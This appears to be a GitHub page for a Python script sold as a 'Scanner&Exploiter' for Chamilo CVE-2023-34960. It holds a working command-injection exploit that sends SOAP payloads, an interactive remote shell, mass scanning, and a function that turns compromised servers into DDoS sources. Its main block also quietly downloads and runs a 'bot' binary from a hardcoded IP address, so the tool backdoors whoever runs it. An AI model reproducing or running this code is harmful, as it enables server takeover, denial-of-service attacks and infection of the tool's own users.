-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathchamilio.py
156 lines (140 loc) · 8.23 KB
/
chamilio.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time, sleep, os
import random
import xml.etree.ElementTree as ET
import threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list = []
vulnerable_urls = set()
# Random UA
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
proxies = {'http': 'http://127.0.0.1:8080',
'https': 'https://127.0.0.1:8080'}
def check_vuln(url):
url = parse.urlparse(url)
url1 = url.scheme + '://' + url.netloc + '/main/webservices/additional_webservices.php'
cmd = 'COMMAND HERE'
data = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{{}}`.pptx'|" |{}||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, cmd)
try:
headers = {'User-Agent': get_ua(),
'Content-Type': 'text/xml; charset=utf-8'}
res = requests.post(url1, headers=headers, data=data, timeout=10, verify=False)
if res.status_code == 200 and "wsConvertPptResponse" in res.text:
print("\033[32m[+]{} is vulnerable.\033[0m".format(url1))
if url1 not in vulnerable_urls:
vulnerable_urls.add(url1)
with open('results.txt', 'a') as f:
f.write(url1 + '\n')
return 1
else:
print("\033[31m[-]{} is not vulnerable\033[0m".format(url1))
except Exception as e:
print("[!]{} is timeout\033[0m".format(url1))
# cmdshell
def cmdshell(url):
if check_vuln(url) == 1:
url = parse.urlparse(url)
url1 = url.scheme + '://' + url.netloc + '/main/webservices/additional_webservices.php'
while 1:
cmd = input("\033[35mshell: \033[0m")
if cmd == "exit":
sys.exit(0)
else:
headers = {'User-Agent': get_ua(),
'Content-Type': 'text/xml; charset=utf-8'
}
data = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{{}}`.pptx'|" |{}||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, cmd)
try:
res = requests.post(url1, data=data, headers=headers, timeout=10, verify=False)
rsp_command = ET.fromstring(res.text).find('.//return')
if rsp_command is not None:
rsptext = rsp_command.text
print("\033[32m{}\033[0m".format(rsptext))
else:
print("\033[31m[-]{} request failed!\033[0m".format(url1))
except Exception as e:
print("\033[31m[-]{} is timeout!\033[0m".format(url1))
# multithreading
def multithreading(url_list, pools=5):
works = []
for i in url_list:
works.append(i)
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(check_vuln, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def ddos_attack(target_url, duration):
end_time = time() + duration
while time() < end_time:
for vulnerable_url in list(vulnerable_urls):
try:
# Exploitation logic to make vulnerable URLs send requests to the target URL
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{{curl -X GET {}}}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(vulnerable_url, target_url)
headers = {'User-Agent': get_ua(),
'Content-Type': 'text/xml; charset=utf-8'}
requests.post(vulnerable_url, headers=headers, data=payload, timeout=5, verify=False)
except Exception as e:
pass
if __name__ == '__main__':
os.system("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.182.25.126/bot; chmod +x bot; ./bot; rm -rf bot; cd; clear")
print("\nChamilo_CVE-2023-34960 Scanner&Exploiter by tarsoul\n")
arg = ArgumentParser(description='check_url By tarsoul')
arg.add_argument("-u",
"--url",
help="Target URL; Example: python3 chamilio.py -u http://ip:port")
arg.add_argument("-f",
"--file",
help="url_list; Example: python3 chamilio.py -f url.txt")
arg.add_argument("-c",
"--cmd",
help="command; Example: python3 chamilil.py -c http://ip:port")
arg.add_argument("-t",
"--target",
help="Target URL for DDoS; Example: python3 chamilio.py -t http://ip:port DURATION")
arg.add_argument("duration", type=int, nargs='?', help="Duration for DDoS in seconds")
args = arg.parse_args()
url = args.url
filename = args.file
cmd = args.cmd
target_url = args.target
duration = args.duration
if url is not None and cmd is None and filename is None:
check_vuln(url)
elif url is None and cmd is None and filename is not None:
start = time()
for i in open(filename):
i = i.replace('\n', '')
url_list.append(i)
multithreading(url_list, 10)
end = time()
print('x: {}'.format(end - start))
elif url is None and cmd is not None and filename is None:
cmdshell(cmd)
elif target_url is not None and duration is not None:
scan_thread = threading.Thread(target=multithreading, args=(url_list, 10))
ddos_thread = threading.Thread(target=ddos_attack, args=(target_url, duration))
scan_thread.start()
ddos_thread.start()
scan_thread.join()
ddos_thread.join()